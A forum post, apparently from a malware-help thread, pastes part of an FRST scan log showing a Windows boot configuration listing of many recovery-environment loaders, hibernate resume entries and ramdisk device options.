identifier              {1c337f50-5892-11e5-ba10-d3779ebad293}
device                  ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{1c337f51-5892-11e5-ba10-d3779ebad293}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
locale                  en-US
inherit                 {bootloadersettings}
displaymessage          Recovery
displaymessageoverride  Recovery
osdevice                ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{1c337f51-5892-11e5-ba10-d3779ebad293}
systemroot              \windows
nx                      OptIn
bootmenupolicy          Standard
winpe                   Yes

Windows Boot Loader
-------------------
identifier              {1c75c318-69ca-11e5-9cf9-9ab429923201}
device                  ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{1c75c319-69ca-11e5-9cf9-9ab429923201}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
locale                  en-US
inherit                 {bootloadersettings}
displaymessage          Recovery
displaymessageoverride  Recovery
osdevice                ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{1c75c319-69ca-11e5-9cf9-9ab429923201}
systemroot              \windows
nx                      OptIn
bootmenupolicy          Standard
winpe                   Yes

Windows Boot Loader
-------------------
identifier              {27b924d8-f19a-11e4-b309-96fcc1ebdff1}
device                  ramdisk=[\Device\HarddiskVolume3]\Recovery\WindowsRE\Winre.wim,{27b924d9-f19a-11e4-b309-96fcc1ebdff1}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
locale                  en-GB
inherit                 {bootloadersettings}
displaymessage          Recovery
displaymessageoverride  Recovery
osdevice                ramdisk=[\Device\HarddiskVolume3]\Recovery\WindowsRE\Winre.wim,{27b924d9-f19a-11e4-b309-96fcc1ebdff1}
systemroot              \windows
nx                      OptIn
bootmenupolicy          Standard
winpe                   Yes

Windows Boot Loader
-------------------
identifier              {2af3ba9e-26f9-11e5-92d8-c964757cb674}
device                  ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{2af3ba9f-26f9-11e5-92d8-c964757cb674}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
locale                  en-US
inherit                 {bootloadersettings}
displaymessage          Recovery
displaymessageoverride  Recovery
osdevice                ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{2af3ba9f-26f9-11e5-92d8-c964757cb674}
systemroot              \windows
nx                      OptIn
bootmenupolicy          Standard
winpe                   Yes

Windows Boot Loader
-------------------
identifier              {362d5e24-90eb-11e6-9cba-ce2631d934cd}
device                  ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{362d5e25-90eb-11e6-9cba-ce2631d934cd}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
locale                  en-US
inherit                 {bootloadersettings}
displaymessage          Recovery
displaymessageoverride  Recovery
osdevice                ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{362d5e25-90eb-11e6-9cba-ce2631d934cd}
systemroot              \windows
nx                      OptIn
bootmenupolicy          Standard
winpe                   Yes

Windows Boot Loader
-------------------
identifier              {39802f98-0e1c-11e5-826f-9d41d4129edd}
device                  ramdisk=[\Device\HarddiskVolume3]\Recovery\WindowsRE\Winre.wim,{39802f99-0e1c-11e5-826f-9d41d4129edd}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
locale                  en-US
inherit                 {bootloadersettings}
displaymessage          Recovery
osdevice                ramdisk=[\Device\HarddiskVolume3]\Recovery\WindowsRE\Winre.wim,{39802f99-0e1c-11e5-826f-9d41d4129edd}
systemroot              \windows
nx                      OptIn
bootmenupolicy          Standard
winpe                   Yes

Windows Boot Loader
-------------------
identifier              {46bc2ade-4ef4-11e6-b864-8e4e49a5f15c}
device                  ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{46bc2adf-4ef4-11e6-b864-8e4e49a5f15c}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
locale                  en-US
inherit                 {bootloadersettings}
displaymessage          Recovery
displaymessageoverride  Recovery
osdevice                ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{46bc2adf-4ef4-11e6-b864-8e4e49a5f15c}
systemroot              \windows
nx                      OptIn
bootmenupolicy          Standard
winpe                   Yes

Windows Boot Loader
-------------------
identifier              {4e494be6-a82c-11e4-9f21-bbcb7c4ae7c6}
device                  ramdisk=[\Device\HarddiskVolume3]\Recovery\WindowsRE\Winre.wim,{4e494be7-a82c-11e4-9f21-bbcb7c4ae7c6}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
locale                  en-US
inherit                 {bootloadersettings}
displaymessage          Recovery
displaymessageoverride  Recovery
osdevice                ramdisk=[\Device\HarddiskVolume3]\Recovery\WindowsRE\Winre.wim,{4e494be7-a82c-11e4-9f21-bbcb7c4ae7c6}
systemroot              \windows
nx                      OptIn
bootmenupolicy          Standard
winpe                   Yes

Windows Boot Loader
-------------------
identifier              {56d2cfbe-ffa5-11e4-9d76-8f895f96bdb5}
device                  ramdisk=[\Device\HarddiskVolume3]\Recovery\WindowsRE\Winre.wim,{56d2cfbf-ffa5-11e4-9d76-8f895f96bdb5}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
locale                  en-GB
inherit                 {bootloadersettings}
displaymessage          Recovery
displaymessageoverride  Recovery
osdevice                ramdisk=[\Device\HarddiskVolume3]\Recovery\WindowsRE\Winre.wim,{56d2cfbf-ffa5-11e4-9d76-8f895f96bdb5}
systemroot              \windows
nx                      OptIn
bootmenupolicy          Standard
winpe                   Yes

Windows Boot Loader
-------------------
identifier              {5ed48d06-3e9d-11e6-b4ce-890e583dd6aa}
device                  ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{5ed48d07-3e9d-11e6-b4ce-890e583dd6aa}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
locale                  en-US
inherit                 {bootloadersettings}
displaymessage          Recovery
displaymessageoverride  Recovery
osdevice                ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{5ed48d07-3e9d-11e6-b4ce-890e583dd6aa}
systemroot              \windows
nx                      OptIn
bootmenupolicy          Standard
winpe                   Yes

Windows Boot Loader
-------------------
identifier              {67a5f5d2-a4f2-11e4-a74f-990c0320d25c}
device                  ramdisk=[\Device\HarddiskVolume3]\Recovery\WindowsRE\Winre.wim,{67a5f5d3-a4f2-11e4-a74f-990c0320d25c}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
locale                  en-US
inherit                 {bootloadersettings}
displaymessage          Recovery
displaymessageoverride  Recovery
osdevice                ramdisk=[\Device\HarddiskVolume3]\Recovery\WindowsRE\Winre.wim,{67a5f5d3-a4f2-11e4-a74f-990c0320d25c}
systemroot              \windows
nx                      OptIn
bootmenupolicy          Standard
winpe                   Yes

Windows Boot Loader
-------------------
identifier              {6f394632-062c-11e5-9e46-c70a78578c1e}
device                  ramdisk=[\Device\HarddiskVolume3]\Recovery\WindowsRE\Winre.wim,{6f394633-062c-11e5-9e46-c70a78578c1e}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
locale                  en-GB
inherit                 {bootloadersettings}
displaymessage          Recovery
displaymessageoverride  Recovery
osdevice                ramdisk=[\Device\HarddiskVolume3]\Recovery\WindowsRE\Winre.wim,{6f394633-062c-11e5-9e46-c70a78578c1e}
systemroot              \windows
nx                      OptIn
bootmenupolicy          Standard
winpe                   Yes

Windows Boot Loader
-------------------
identifier              {74b63f52-352e-11e6-9274-dba575b7dfbb}
device                  ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{74b63f53-352e-11e6-9274-dba575b7dfbb}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
locale                  en-US
inherit                 {bootloadersettings}
displaymessage          Recovery
osdevice                ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{74b63f53-352e-11e6-9274-dba575b7dfbb}
systemroot              \windows
nx                      OptIn
bootmenupolicy          Standard
winpe                   Yes

Windows Boot Loader
-------------------
identifier              {84377094-c7f6-11e6-8d9d-9dd2077c58d7}
device                  ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{84377095-c7f6-11e6-8d9d-9dd2077c58d7}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
locale                  en-US
inherit                 {bootloadersettings}
displaymessage          Recovery
osdevice                ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{84377095-c7f6-11e6-8d9d-9dd2077c58d7}
systemroot              \windows
nx                      OptIn
bootmenupolicy          Standard
winpe                   Yes

Windows Boot Loader
-------------------
identifier              {89f532e4-5ef3-11e4-a253-a762ade906b2}
device                  ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{89f532e5-5ef3-11e4-a253-a762ade906b2}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
locale                  en-US
inherit                 {bootloadersettings}
displaymessage          Recovery
displaymessageoverride  Recovery
osdevice                ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{89f532e5-5ef3-11e4-a253-a762ade906b2}
systemroot              \windows
nx                      OptIn
bootmenupolicy          Standard
winpe                   Yes

Windows Boot Loader
-------------------
identifier              {90d1b72e-2104-11e5-9fe8-96955d914c1a}
device                  ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{90d1b72f-2104-11e5-9fe8-96955d914c1a}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
locale                  en-US
inherit                 {bootloadersettings}
displaymessage          Recovery
displaymessageoverride  Recovery
osdevice                ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{90d1b72f-2104-11e5-9fe8-96955d914c1a}
systemroot              \windows
nx                      OptIn
bootmenupolicy          Standard
winpe                   Yes

Windows Boot Loader
-------------------
identifier              {90ec7a02-ad1f-11e6-a6b2-cd1b6bd63995}
device                  ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{90ec7a03-ad1f-11e6-a6b2-cd1b6bd63995}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
locale                  en-US
inherit                 {bootloadersettings}
displaymessage          Recovery
displaymessageoverride  Recovery
osdevice                ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{90ec7a03-ad1f-11e6-a6b2-cd1b6bd63995}
systemroot              \windows
nx                      OptIn
bootmenupolicy          Standard
winpe                   Yes

Windows Boot Loader
-------------------
identifier              {aba9da96-2c6f-11e5-9b7e-99b7c27ee180}
device                  ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{aba9da97-2c6f-11e5-9b7e-99b7c27ee180}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
locale                  en-US
inherit                 {bootloadersettings}
displaymessage          Recovery
displaymessageoverride  Recovery
osdevice                ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{aba9da97-2c6f-11e5-9b7e-99b7c27ee180}
systemroot              \windows
nx                      OptIn
bootmenupolicy          Standard
winpe                   Yes

Windows Boot Loader
-------------------
identifier              {bd8e81a8-5115-11e6-b299-cac8d5d6ee70}
device                  ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{bd8e81a9-5115-11e6-b299-cac8d5d6ee70}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
locale                  en-US
inherit                 {bootloadersettings}
displaymessage          Recovery
osdevice                ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{bd8e81a9-5115-11e6-b299-cac8d5d6ee70}
systemroot              \windows
nx                      OptIn
bootmenupolicy          Standard
winpe                   Yes

Windows Boot Loader
-------------------
identifier              {bdae523f-d33f-11e4-b541-bf24e1a268f6}
device                  ramdisk=[\Device\HarddiskVolume3]\Recovery\WindowsRE\Winre.wim,{bdae5240-d33f-11e4-b541-bf24e1a268f6}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
locale                  en-US
inherit                 {bootloadersettings}
displaymessage          Recovery
osdevice                ramdisk=[\Device\HarddiskVolume3]\Recovery\WindowsRE\Winre.wim,{bdae5240-d33f-11e4-b541-bf24e1a268f6}
systemroot              \windows
nx                      OptIn
bootmenupolicy          Standard
winpe                   Yes

Windows Boot Loader
-------------------
identifier              {c0563398-74d7-11e4-ab1c-9cb198ec84d4}
device                  ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{c0563399-74d7-11e4-ab1c-9cb198ec84d4}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
locale                  en-US
inherit                 {bootloadersettings}
displaymessage          Recovery
displaymessageoverride  Recovery
osdevice                ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{c0563399-74d7-11e4-ab1c-9cb198ec84d4}
systemroot              \windows
nx                      OptIn
bootmenupolicy          Standard
winpe                   Yes

Windows Boot Loader
-------------------
identifier              {ca4e4463-2050-11e6-848b-b0cf0c155543}
device                  ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{ca4e4464-2050-11e6-848b-b0cf0c155543}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
locale                  en-US
inherit                 {bootloadersettings}
displaymessage          Recovery
displaymessageoverride  Recovery
osdevice                ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{ca4e4464-2050-11e6-848b-b0cf0c155543}
systemroot              \windows
nx                      OptIn
bootmenupolicy          Standard
winpe                   Yes

Windows Boot Loader
-------------------
identifier              {eed8252a-1c62-11e5-9523-b09403b1f74a}
device                  ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{eed8252b-1c62-11e5-9523-b09403b1f74a}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
locale                  en-US
inherit                 {bootloadersettings}
displaymessage          Recovery
displaymessageoverride  Recovery
osdevice                ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{eed8252b-1c62-11e5-9523-b09403b1f74a}
systemroot              \windows
nx                      OptIn
bootmenupolicy          Standard
winpe                   Yes

Windows Boot Loader
-------------------
identifier              {fa4c8e4c-778e-11e5-bd80-df3b4abbd218}
device                  ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{fa4c8e4d-778e-11e5-bd80-df3b4abbd218}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
locale                  en-US
inherit                 {bootloadersettings}
displaymessage          Recovery
displaymessageoverride  Recovery
osdevice                ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{fa4c8e4d-778e-11e5-bd80-df3b4abbd218}
systemroot              \windows
nx                      OptIn
bootmenupolicy          Standard
winpe                   Yes

Resume from Hibernate
---------------------
identifier              {04313033-352e-11e6-9274-dba575b7dfbb}
device                  partition=C:
path                    \WINDOWS\system32\winresume.exe
description             Windows Resume Application
locale                  en-US
inherit                 {resumeloadersettings}
recoverysequence        {74b63f52-352e-11e6-9274-dba575b7dfbb}
recoveryenabled         Yes
allowedinmemorysettings 0x15000075
filedevice              partition=C:
filepath                \hiberfil.sys
bootmenupolicy          Standard
debugoptionenabled      No

Resume from Hibernate
---------------------
identifier              {04d461d9-c7f6-11e6-8d9d-9dd2077c58d7}
device                  partition=C:
path                    \WINDOWS\system32\winresume.exe
description             Windows Resume Application
locale          &

Offline Ozzie

Re: File Type Question
« Reply #34 on: January 25, 2017, 09:00:45 PM »
20th continuation of FRST

Resume from Hibernate
---------------------
identifier              {1f85e35b-ad1f-11e6-a6b2-cd1b6bd63995}
device                  partition=C:
path                    \WINDOWS\system32\winresume.exe
description             Windows Resume Application
locale                  en-US
inherit                 {resumeloadersettings}
recoverysequence        {90ec7a02-ad1f-11e6-a6b2-cd1b6bd63995}
recoveryenabled         Yes
allowedinmemorysettings 0x15000075
filedevice              partition=C:
filepath                \hiberfil.sys
bootmenupolicy          Standard
debugoptionenabled      No

Resume from Hibernate
---------------------
identifier              {3aefe89e-a4f1-11e4-a74f-990c0320d25c}
device                  partition=C:
path                    \WINDOWS\system32\winresume.exe
description             Windows Resume Application
locale                  en-US
inherit                 {resumeloadersettings}
recoverysequence        {67a5f5d2-a4f2-11e4-a74f-990c0320d25c}
recoveryenabled         Yes
allowedinmemorysettings 0x15000075
filedevice              partition=C:
filepath                \hiberfil.sys
bootmenupolicy          Standard
debugoptionenabled      No

Resume from Hibernate
---------------------
identifier              {405b0c58-5878-11e5-ba10-d3779ebad293}
device                  partition=C:
path                    \WINDOWS\system32\winresume.exe
description             Windows Resume Application
locale                  en-US
inherit                 {resumeloadersettings}
recoverysequence        {1c337f50-5892-11e5-ba10-d3779ebad293}
recoveryenabled         Yes
allowedinmemorysettings 0x15000075
filedevice              partition=C:
filepath                \hiberfil.sys
bootmenupolicy          Standard
debugoptionenabled      No

Resume from Hibernate
---------------------
identifier              {45383338-9fbd-11e5-bc98-a742e1ee1e86}
device                  partition=C:
path                    \WINDOWS\system32\winresume.exe
description             Windows Resume Application
locale                  en-US
inherit                 {resumeloadersettings}
recoverysequence        {0a3beb22-9fbe-11e5-bc98-a742e1ee1e86}
recoveryenabled         Yes
allowedinmemorysettings 0x15000075
filedevice              partition=C:
filepath                \hiberfil.sys
bootmenupolicy          Standard
debugoptionenabled      No

Resume from Hibernate
---------------------
identifier              {595939b6-2103-11e5-9fe8-96955d914c1a}
device                  partition=C:
path                    \WINDOWS\system32\winresume.exe
description             Windows Resume Application
locale                  en-US
inherit                 {resumeloadersettings}
recoverysequence        {90d1b72e-2104-11e5-9fe8-96955d914c1a}
recoveryenabled         Yes
allowedinmemorysettings 0x15000075
filedevice              partition=C:
filepath                \hiberfil.sys
bootmenupolicy          Standard
debugoptionenabled      No

Resume from Hibernate
---------------------
identifier              {5bac4a59-2050-11e6-848b-b0cf0c155543}
device                  partition=C:
path                    \WINDOWS\system32\winresume.exe
description             Windows Resume Application
locale                  en-US
inherit                 {resumeloadersettings}
recoverysequence        {ca4e4463-2050-11e6-848b-b0cf0c155543}
recoveryenabled         Yes
allowedinmemorysettings 0x15000075
filedevice              partition=C:
filepath                \hiberfil.sys
bootmenupolicy          Standard
debugoptionenabled      No

Resume from Hibernate
---------------------
identifier              {6ac0f650-f199-11e4-b309-96fcc1ebdff1}
device                  partition=C:
path                    \WINDOWS\system32\winresume.exe
description             Windows Resume Application
locale                  en-GB
inherit                 {resumeloadersettings}
recoverysequence        {27b924d8-f19a-11e4-b309-96fcc1ebdff1}
recoveryenabled         Yes
allowedinmemorysettings 0x15000075
filedevice              partition=C:
filepath                \hiberfil.sys
bootmenupolicy          Standard
debugoptionenabled      No

Resume from Hibernate
---------------------
identifier              {72d05f34-74d6-11e4-ab1c-9cb198ec84d4}
device                  partition=C:
path                    \WINDOWS\system32\winresume.exe
description             Windows Resume Application
locale                  en-US
inherit                 {resumeloadersettings}
recoverysequence        {c0563398-74d7-11e4-ab1c-9cb198ec84d4}
recoveryenabled         Yes
allowedinmemorysettings 0x15000075
filedevice              partition=C:
filepath                \hiberfil.sys
bootmenupolicy          Standard
debugoptionenabled      No

Resume from Hibernate
---------------------
identifier              {74c4be10-3600-11e0-8ff1-0018716eb820}
device                  partition=C:
path                    \Windows\system32\winresume.exe
description             Windows Resume Application
locale                  en-US
inherit                 {resumeloadersettings}
filedevice              partition=C:
filepath                \hiberfil.sys
debugoptionenabled      No

Resume from Hibernate
---------------------
identifier              {8362fcd7-ffa4-11e4-9d76-8f895f96bdb5}
device                  partition=C:
path                    \WINDOWS\system32\winresume.exe
description             Windows Resume Application
locale                  en-US
inherit                 {resumeloadersettings}
recoverysequence        {56d2cfbe-ffa5-11e4-9d76-8f895f96bdb5}
recoveryenabled         Yes
allowedinmemorysettings 0x15000075
filedevice              partition=C:
filepath                \hiberfil.sys
bootmenupolicy          Standard
debugoptionenabled      No

Resume from Hibernate
---------------------
identifier              {8b93df4d-3e9c-11e6-b4ce-890e583dd6aa}
device                  partition=C:
path                    \WINDOWS\system32\winresume.exe
description             Windows Resume Application
locale                  en-US
inherit                 {resumeloadersettings}
recoverysequence        {5ed48d06-3e9d-11e6-b4ce-890e583dd6aa}
recoveryenabled         Yes
allowedinmemorysettings 0x15000075
filedevice              partition=C:
filepath                \hiberfil.sys
bootmenupolicy          Standard
debugoptionenabled      No

Resume from Hibernate
---------------------
identifier              {9dccde00-5ef1-11e4-a253-a762ade906b2}
device                  partition=C:
path                    \WINDOWS\system32\winresume.exe
description             Windows Resume Application
locale                  en-US
inherit                 {resumeloadersettings}
recoverysequence        {89f532e4-5ef3-11e4-a253-a762ade906b2}
recoveryenabled         Yes
allowedinmemorysettings 0x15000075
filedevice              partition=C:
filepath                \hiberfil.sys
bootmenupolicy          Standard
debugoptionenabled      No

Resume from Hibernate
---------------------
identifier              {a1420209-2c6e-11e5-9b7e-99b7c27ee180}
device                  partition=C:
path                    \WINDOWS\system32\winresume.exe
description             Windows Resume Application
locale                  en-US
inherit                 {resumeloadersettings}
recoverysequence        {aba9da96-2c6f-11e5-9b7e-99b7c27ee180}
recoveryenabled         Yes
allowedinmemorysettings 0x15000075
filedevice              partition=C:
filepath                \hiberfil.sys
bootmenupolicy          Standard
debugoptionenabled      No

Resume from Hibernate
---------------------
identifier              {a9340868-26f8-11e5-92d8-c964757cb674}
device                  partition=C:
path                    \WINDOWS\system32\winresume.exe
description             Windows Resume Application
locale                  en-US
inherit                 {resumeloadersettings}
recoverysequence        {2af3ba9e-26f9-11e5-92d8-c964757cb674}
recoveryenabled         Yes
allowedinmemorysettings 0x15000075
filedevice              partition=C:
filepath                \hiberfil.sys
bootmenupolicy          Standard
debugoptionenabled      No

Resume from Hibernate
---------------------
identifier              {aa5b5bcf-fe02-11e5-a48d-a04756c6d275}
device                  partition=C:
path                    \WINDOWS\system32\winresume.exe
description             Windows Resume Application
locale                  en-US
inherit                 {resumeloadersettings}
recoverysequence        {1817421a-fe03-11e5-a48d-a04756c6d275}
recoveryenabled         Yes
allowedinmemorysettings 0x15000075
filedevice              partition=C:
filepath                \hiberfil.sys
bootmenupolicy          Standard
debugoptionenabled      No

Resume from Hibernate
---------------------
identifier              {b2e989df-4ada-11e5-90ec-a1eca10b6741}
device                  partition=C:
path                    \WINDOWS\system32\winresume.exe
description             Windows Resume Application
locale                  en-US
inherit                 {resumeloadersettings}
recoverysequence        {01381978-4adb-11e5-90ec-a1eca10b6741}
recoveryenabled         Yes
allowedinmemorysettings 0x15000075
filedevice              partition=C:
filepath                \hiberfil.sys
bootmenupolicy          Standard
debugoptionenabled      No

Resume from Hibernate
---------------------
identifier              {b4fb9e1a-90ea-11e6-9cba-ce2631d934cd}
device                  partition=C:
path                    \WINDOWS\system32\winresume.exe
description             Windows Resume Application
locale                  en-US
inherit                 {resumeloadersettings}
recoverysequence        {362d5e24-90eb-11e6-9cba-ce2631d934cd}
recoveryenabled         Yes
allowedinmemorysettings 0x15000075
filedevice              partition=C:
filepath                \hiberfil.sys
bootmenupolicy          Standard
debugoptionenabled      No

Resume from Hibernate
---------------------
identifier              {d0b36eaa-778d-11e5-bd80-df3b4abbd218}
device                  partition=C:
path                    \WINDOWS\system32\winresume.exe
description             Windows Resume Application
locale                  en-US
inherit                 {resumeloadersettings}
recoverysequence        {fa4c8e4c-778e-11e5-bd80-df3b4abbd218}
recoveryenabled         Yes
allowedinmemorysettings 0x15000075
filedevice              partition=C:
filepath                \hiberfil.sys
bootmenupolicy          Standard
debugoptionenabled      No

Resume from Hibernate
---------------------
identifier              {d0f0ec58-4ef3-11e6-b864-8e4e49a5f15c}
device                  partition=C:
path                    \WINDOWS\system32\winresume.exe
description             Windows Resume Application
locale                  en-US
inherit                 {resumeloadersettings}
recoverysequence        {46bc2ade-4ef4-11e6-b864-8e4e49a5f15c}
recoveryenabled         Yes
allowedinmemorysettings 0x15000075
filedevice              partition=C:
filepath                \hiberfil.sys
bootmenupolicy          Standard
debugoptionenabled      No

Resume from Hibernate
---------------------
identifier              {e86dc95c-5114-11e6-b299-cac8d5d6ee70}
device                  partition=C:
path                    \WINDOWS\system32\winresume.exe
description             Windows Resume Application
locale                  en-US
inherit                 {resumeloadersettings}
recoverysequence        {bd8e81a8-5115-11e6-b299-cac8d5d6ee70}
recoveryenabled         Yes
allowedinmemorysettings 0x15000075
filedevice              partition=C:
filepath                \hiberfil.sys
bootmenupolicy          Standard
debugoptionenabled      No

Resume from Hibernate
---------------------
identifier              {eed82528-1c62-11e5-9523-b09403b1f74a}
device                  partition=C:
path                    \Windows\system32\winresume.exe
description             Windows Resume Application
locale                  en-US
inherit                 {resumeloadersettings}
recoverysequence        {eed8252a-1c62-11e5-9523-b09403b1f74a}
recoveryenabled         Yes
allowedinmemorysettings 0x15000075
filedevice              partition=C:
filepath                \hiberfil.sys
bootmenupolicy          Standard
debugoptionenabled      No

Resume from Hibernate
---------------------
identifier              {f5c59a7d-5d4d-11e4-b3b5-8fd73e18ab92}
device                  partition=C:
path                    \WINDOWS\system32\winresume.exe
description             Windows Resume Application
locale                  en-US
inherit                 {resumeloadersettings}
recoverysequence        {0bc6c150-5d4e-11e4-b3b5-8fd73e18ab92}
recoveryenabled         Yes
allowedinmemorysettings 0x15000075
filedevice              partition=C:
filepath                \hiberfil.sys
bootmenupolicy          Standard
debugoptionenabled      No

Resume from Hibernate
---------------------
identifier              {f732e007-d33e-11e4-b541-bf24e1a268f6}
device                  partition=C:
path                    \WINDOWS\system32\winresume.exe
description             Windows Resume Application
locale                  en-US
inherit                 {resumeloadersettings}
recoverysequence        {bdae523f-d33f-11e4-b541-bf24e1a268f6}
recoveryenabled         Yes
allowedinmemorysettings 0x15000075
filedevice              partition=C:
filepath                \hiberfil.sys
bootmenupolicy          Standard
debugoptionenabled      No

Resume from Hibernate
---------------------
identifier              {ffe3a91b-a82a-11e4-9f21-bbcb7c4ae7c6}
device                  partition=C:
path                    \WINDOWS\system32\winresume.exe
description             Windows Resume Application
locale                  en-US
inherit                 {resumeloadersettings}
recoverysequence        {4e494be6-a82c-11e4-9f21-bbcb7c4ae7c6}
recoveryenabled         Yes
allowedinmemorysettings 0x15000075
filedevice              partition=C:
filepath                \hiberfil.sys
bootmenupolicy          Standard
debugoptionenabled      No

Windows Memory Tester
---------------------
identifier              {memdiag}
device                  partition=\Device\HarddiskVolume1
path                    \boot\memtest.exe
description             Windows Memory Diagnostic
locale                  en-US
inherit                 {globalsettings}
badmemoryaccess         Yes

EMS Settings
------------
identifier              {emssettings}
bootems                 No

Debugger Settings
-----------------
identifier              {dbgsettings}
debugtype               Serial
debugport               1
baudrate                115200

RAM Defects
-----------
identifier              {badmemory}

Global Settings
---------------
identifier              {globalsettings}
inherit                 {dbgsettings}
                        {emssettings}
                        {badmemory}

Boot Loader Settings
--------------------
identifier              {bootloadersettings}
inherit                 {globalsettings}
                        {hypervisorsettings}

Hypervisor Settings
-------------------
identifier              {hypervisorsettings}
hypervisordebugtype     Serial
hypervisordebugport     1
hypervisorbaudrate      115200

Resume Loader Settings
----------------------
identifier              {resumeloadersettings}
inherit                 {globalsettings}

Device options
--------------
identifier              {01381979-4adb-11e5-90ec-a1eca10b6741}
description             Windows Recovery
ramdisksdidevice        partition=C:
ramdisksdipath          \Recovery\WindowsRE\boot.sdi

Device options
--------------
identifier              {0561ba6b-a4de-11e4-95f8-386077a7a31a}
description             Windows Setup
ramdisksdidevice        partition=C:
ramdisksdipath          \$WINDOWS.~BT\Sources\SafeOS\boot.sdi

Device options
--------------
identifier              {072c6105-50fa-11e6-baf2-d0df9ade1364}
description             Windows Setup
ramdisksdidevice        partition=C:
ramdisksdipath          \$WINDOWS.~BT\Sources\SafeOS\boot.sdi

Device options
--------------
identifier              {07f471a4-3b00-11e1-8ee8-d0df9ade1364}
description             Ramdisk Options
ramdisksdidevice        partition=D:
ramdisksdipath          \Recovery\WindowsRE\boot.sdi

Device options
--------------
identifier              {0a3beb23-9fbe-11e5-bc98-a742e1ee1e86}
description             Windows Recovery
ramdisksdidevice        partition=C:
ramdisksdipath          \Recovery\WindowsRE\boot.sdi

Device options
--------------
identifier              {0bc6c151-5d4e-11e4-b3b5-8fd73e18ab92}
description             Windows Recovery
ramdisksdidevice        partition=C:
ramdisksdipath          \Recovery\WindowsRE\boot.sdi

Device options
--------------
identifier              {10e34318-3513-11e6-b390-d0df9ade1364}
description             Windows Setup
ramdisksdidevice        partition=C:
ramdisksdipath          \$WINDOWS.~BT\Sources\SafeOS\boot.sdi

Device options
--------------
identifier              {1817421b-fe03-11e5-a48d-a04756c6d275}
description             Windows Recovery
ramdisksdidevice        partition=C:
ramdisksdipath          \Recovery\WindowsRE\boot.sdi

Device options
--------------
identifier              {19a2ec41-2c54-11e5-99c3-d0df9ade1364}
description             Windows Setup
ramdisksdidevice        partition=C:
ramdisksdipath          \$WINDOWS.~BT\Sources\SafeOS\boot.sdi

Device options
--------------
identifier              {1c337f51-5892-11e5-ba10-d3779ebad293}
description             Windows Recovery
ramdisksdidevice        partition=C:
ramdisksdipath          \Recovery\WindowsRE\boot.sdi

Device options
--------------
identifier              {1c75c319-69ca-11e5-9cf9-9ab429923201}
description             Windows Recovery
ramdisksdidevice        partition=C:
ramdisksdipath          \Recovery\WindowsRE\boot.sdi

Device options
--------------
identifier              {1f059db4-0e00-11e5-9654-d0df9ade1364}
description             Windows Setup
ramdisksdidevice        partition=C:
ramdisksdipath          \$WINDOWS.~BT\Sources\SafeOS\boot.sdi

Device options
--------------
identifier              {2179e136-74c4-11e4-95dd-386077a7a31a}
description             Windows Setup
ramdisksdidevice        partition=C:
ramdisksdipath          \$WINDOWS.~BT\Sources\SafeOS\boot.sdi

Device options
--------------
identifier              {27b924d9-f19a-11e4-b309-96fcc1ebdff1}
description             Windows Recovery
ramdisksdidevice        partition=\Device\HarddiskVolume3
ramdisksdipath          \Recovery\WindowsRE\boot.sdi

Device options
--------------
identifier              {2af3ba9f-26f9-11e5-92d8-c964757cb674}
description             Windows Recovery
ramdisksdidevice        partition=C:
ramdisksdipath          \Recovery\WindowsRE\boot.sdi

Device options
--------------
identifier              {33cbba83-585d-11e5-b6aa-d0df9ade1364}
description             Windows Setup
ramdisksdidevice        partition=C:
ramdisksdipath          \$WINDOWS.~BT\Sources\SafeOS\boot.sdi

Device options
--------------
identifier              {362d5e25-90eb-11e6-9cba-ce2631d934cd}
description             Windows Recovery
